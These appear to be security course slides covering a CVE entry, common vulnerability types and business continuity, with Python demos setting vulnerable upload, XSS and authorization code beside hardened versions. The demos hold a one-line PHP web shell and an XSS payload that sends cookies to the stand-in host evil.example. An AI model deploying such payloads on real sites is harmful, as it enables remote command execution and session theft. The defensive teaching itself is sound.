Security
SECURITY VULNERABILITY AND RISK
Threat and vulnerability
VULNERABILITY
Name: CVE-1999-0002
Status: Entry
Reference: BID:121
Reference: URL:http://www.securityfocus.com/bid/121
Reference: CERT:CA-98.12.mountd
Reference: CIAC:J-006
Reference: URL:http://www.ciac.org/ciac/bulletins/j-006.shtml
Reference: SGI:19981006-01-I
Reference: URL:ftp://patches.sgi.com/support/free/security/advisories/19981006-01-I
Reference: XF:linux-mountd-bo
Buffer overflow in NFS mountd gives root access to remote
attackers, mostly in Linux systems.
Common Vulnerability Scoring System
Unrestricted upload
The unrestricted upload vulnerability occurs when software accepts files
without verifying that each file conforms to a strict specification (allowed type,
content, size and name).
It is then possible for an attacker to upload an executable program to the site
in place of an image.
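The following is an added example, not code from the original slides: a naive upload handler beside a hardened one. The upload directory, the 5 MiB size cap, the PNG/JPEG/GIF allowlist and the "avatar.php" payload are all assumptions constructed for the demonstration.

```python
"""Unrestricted file upload: a naive handler beside a hardened one.

Added example, not from the original slides. File names, contents and the
size limit below are constructed for the demonstration.
"""
import os
import secrets
import tempfile

# Allowlist of accepted image types: extension -> acceptable leading bytes.
ALLOWED_IMAGE_TYPES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
MAX_UPLOAD_BYTES = 5 * 1024 * 1024  # assumed policy value: 5 MiB


def save_upload_unsafe(upload_dir, filename, data):
    """Vulnerable: trusts the client-supplied name and never looks at the bytes.

    "shell.php" is written exactly as sent, so an attacker uploads a program
    where the site expected an image.
    """
    path = os.path.join(upload_dir, filename)
    with open(path, "wb") as fh:
        fh.write(data)
    return path


def validate_image(filename, data):
    """Return the canonical extension if the upload passes every check, else None."""
    if len(data) > MAX_UPLOAD_BYTES:
        return None
    # Only the extension of the basename counts; directory parts are ignored.
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    magics = ALLOWED_IMAGE_TYPES.get(ext)
    if magics is None:
        return None  # extension not on the allowlist (.php, .py, .exe, ...)
    if not any(data.startswith(m) for m in magics):
        return None  # extension claims an image, the content does not
    return ".jpg" if ext == ".jpeg" else ext


def save_upload_safe(upload_dir, filename, data):
    """Hardened: validate the content, then store under a server-chosen name."""
    ext = validate_image(filename, data)
    if ext is None:
        raise ValueError("rejected upload: not an allowed image")
    # Random name chosen by the server: the client never controls the path.
    stored_name = secrets.token_hex(16) + ext
    path = os.path.join(upload_dir, stored_name)
    # O_EXCL refuses to overwrite an existing file; 0o600 keeps it private.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path


def demo():
    """Run both handlers on constructed inputs.

    Returns (unsafe handler wrote avatar.php, safe handler rejected it,
    safe handler accepted a real PNG under a server-chosen name).
    """
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64        # constructed PNG-like bytes
    script = b"<?php system($_GET['cmd']); ?>"       # constructed payload
    with tempfile.TemporaryDirectory() as d:
        unsafe_path = save_upload_unsafe(d, "avatar.php", script)
        unsafe_wrote_php = os.path.basename(unsafe_path) == "avatar.php"
        try:
            save_upload_safe(d, "avatar.php", script)
            safe_rejected = False
        except ValueError:
            safe_rejected = True
        safe_path = save_upload_safe(d, "avatar.png", png)
        stored = os.path.basename(safe_path)
        safe_accepted = stored.endswith(".png") and "avatar" not in stored
    return unsafe_wrote_php, safe_rejected, safe_accepted


if __name__ == "__main__":
    print(demo())
```

The magic-byte check alone is not sufficient: a valid image can still carry script text inside it (a polyglot), which is why the hardened handler also discards the client's name and extension and writes the file under a server-chosen image extension in a directory the web server serves as static content rather than executes.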
Cross-site Scripting
occurs when user-supplied input is used without verification or output encoding as part
of the output served to other users, so the attacker's script runs in those users' browsers.
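The following is an added example, not code from the original slides: a comment renderer that concatenates user input straight into HTML, beside renderers that encode the input for the context it lands in (element content, attribute value, inline script). The comment text, the "mallory" author and the payloads are constructed for the demonstration.

```python
"""Cross-site scripting (XSS): output built from user input without encoding,
beside output encoded for the HTML context it lands in.

Added example, not from the original slides; authors, comment text and
payloads below are constructed for the demonstration.
"""
import html
import json


def render_comment_unsafe(author, text):
    """Vulnerable: user input is concatenated straight into HTML served to other users."""
    return f'<div class="comment"><b>{author}</b>: {text}</div>'


def render_comment_safe(author, text):
    """Hardened: entity-encode every user-controlled value placed in element content.

    html.escape turns < > & " ' into entities, so a stored <script> tag is shown
    as text instead of being executed by the next visitor's browser.
    """
    return (
        '<div class="comment"><b>' + html.escape(author)
        + "</b>: " + html.escape(text) + "</div>"
    )


def render_profile_link_safe(display_name, user_id):
    """Attribute context: always quote the attribute and entity-encode quotes inside it.

    An input such as  x" onmouseover="alert(1)  can then no longer close the
    title attribute early and attach an event handler.
    """
    uid = html.escape(str(int(user_id)))  # user_id is assumed to be an integer id
    name = html.escape(display_name)
    return '<a href="/user/' + uid + '" title="' + name + '">' + name + "</a>"


def render_inline_script_safe(profile):
    """Script context: HTML entity encoding is the wrong tool here.

    Serialize with json.dumps and break up every "</" so that a value containing
    </script> cannot terminate the script block.
    """
    payload = json.dumps(profile).replace("</", "<\\/")
    return "<script>var profile = " + payload + ";</script>"


def demo():
    """Render one constructed stored-XSS payload through both comment renderers."""
    payload = '<script>new Image().src="http://evil.example/?c="+document.cookie</script>'
    return render_comment_unsafe("mallory", payload), render_comment_safe("mallory", payload)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

The point of the three safe renderers is that the correct encoding depends on where the value is placed: what is enough for element content is not enough inside a script block, and an unquoted attribute is unsafe no matter how the value is encoded.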
Software vulnerability
Buffer overflow
refers to the situation where a program writes more data into a storage location (a buffer)
than it was allocated to hold, overwriting adjacent memory
Missing Authorization
happens when a software program allows users access to privileged parts of the program
without verifying that the user is actually permitted to use them (checking who the user is
is authentication; checking what that user may do is authorization).
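The following is an added example, not code from the original slides: an invoice lookup that only checks that the caller is logged in, beside one that also checks that the caller is permitted to see the requested record. The users, session tokens, roles and invoice records are constructed in-memory data.

```python
"""Missing authorization: being authenticated is not the same as being authorized.

Added example, not from the original slides. Users, roles, session tokens
and invoice records are constructed in-memory data.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    name: str
    role: str  # assumed roles: "customer" or "finance"


# Constructed data: invoice id -> record, and session token -> logged-in user.
INVOICES = {
    1001: {"owner": "alice", "amount": 120.0},
    1002: {"owner": "bob", "amount": 990.0},
}
SESSIONS = {
    "tok-alice": User("alice", "customer"),
    "tok-bob": User("bob", "customer"),
    "tok-carol": User("carol", "finance"),
}


class AuthError(Exception):
    """Caller is not logged in."""


class Forbidden(Exception):
    """Caller is logged in but not allowed to see the resource."""


def authenticate(token):
    """Authentication only: map a session token to a user, or fail."""
    user = SESSIONS.get(token)
    if user is None:
        raise AuthError("not logged in")
    return user


def get_invoice_unsafe(token, invoice_id):
    """Vulnerable: checks WHO the caller is, never WHETHER they may see this record.

    Alice reads Bob's invoice simply by changing the id in her request.
    """
    authenticate(token)
    return INVOICES[invoice_id]


def can_view_invoice(user, invoice):
    """Authorization rule: owners see their own invoices; the finance role sees all."""
    return user.role == "finance" or invoice["owner"] == user.name


def get_invoice_safe(token, invoice_id):
    """Hardened: authenticate, then apply the authorization rule to the specific record."""
    user = authenticate(token)
    invoice = INVOICES.get(invoice_id)
    if invoice is None or not can_view_invoice(user, invoice):
        # Same response for "no such record" and "not yours", so the caller
        # cannot enumerate which ids exist.
        raise Forbidden("invoice not available")
    return invoice


def demo():
    """Returns (unsafe lookup leaks another user's invoice, safe lookup blocks it,
    owner still allowed, finance role allowed)."""
    leaked = get_invoice_unsafe("tok-alice", 1002)["owner"] == "bob"
    try:
        get_invoice_safe("tok-alice", 1002)
        blocked = False
    except Forbidden:
        blocked = True
    owner_ok = get_invoice_safe("tok-alice", 1001)["owner"] == "alice"
    finance_ok = get_invoice_safe("tok-carol", 1002)["owner"] == "bob"
    return leaked, blocked, owner_ok, finance_ok


if __name__ == "__main__":
    print(demo())
```

The check has to be made against the specific object requested, not just the endpoint: a login gate on the "view invoice" page does nothing to stop a logged-in customer from walking through other customers' invoice ids.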
Unencrypted data
occurs when sensitive data is stored locally or transmitted over a network without proper
encryption
Procedural vulnerability
https://www.youtube.com/watch?v=opRMrEfAIiI
Information security
Business survival depends on information security.
PROCESSES
TECHNOLOGY
People (Who we are)
Request fulfillment
Access management
Identity management
Service Level / Third-party Services Management
IT procurement process etc...
Technology (What we use to improve what we do)
Network Infrastructure:
Cabling, Data/Voice Networks and equipment
Telecommunications services (PABX), including VoIP services, ISDN, Video Conferencing
Server computers and associated storage devices
Operating software for server computers
Communications equipment and related hardware.
Intranet and Internet connections
VPNs and Virtual environments
Remote access services
Wireless connectivity
Application software:
Finance and assets systems, including Accounting packages, Inventory
management, HR systems, Assessment and reporting systems
Software as a service (SaaS) instead of software as a packaged or custom-made product, etc.
Physical Security components:
CCTV Cameras
Clock in systems / Biometrics
Environmental management systems: Humidity Control, Ventilation, Air Conditioning, Fire Control systems
Electricity / Power backup
Access devices:
Desktop computers
Laptops, ultra-mobile laptops and PDAs; thin client computing.
Digital cameras, Printers, Scanners, Photocopier etc.
Organizational security
LOSS OF GOODWILL
• Information Security is an "organizational problem" rather than an "IT problem"
• More than 70% of threats are internal
Flood.
Cyber attack.
Supply chain failure or losing a key employee.
Disruptions to your business can happen at any moment.
Business continuity is about having a plan to deal with difficult situations, so your
organization can continue to function with as little disruption as possible.
Whether it’s a business, public sector organization, or charity, you need to know
how you can keep going under any circumstances.
Group Discussion